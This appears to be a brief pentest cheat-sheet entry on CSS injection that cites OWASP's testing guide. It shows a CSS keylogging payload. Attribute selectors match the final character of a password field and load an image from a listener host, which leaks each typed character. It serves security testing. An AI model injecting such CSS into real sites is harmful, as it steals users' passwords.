CSS

CSS Injection

• Testing for CSS Injection (OWASP, WSTG-CLNT-05)

CSS as a keylogger

Use with HTML Injection. See CSS-Keylogging and original source.

<style>
input[type="password"][value$="a"] {
 background-image: url("http[:]//localhost[:]3000/a");
}
 
input[type="password"][value$="b"] {
  background-image: url("http[:]//localhost[:]3000/b");
}
</style>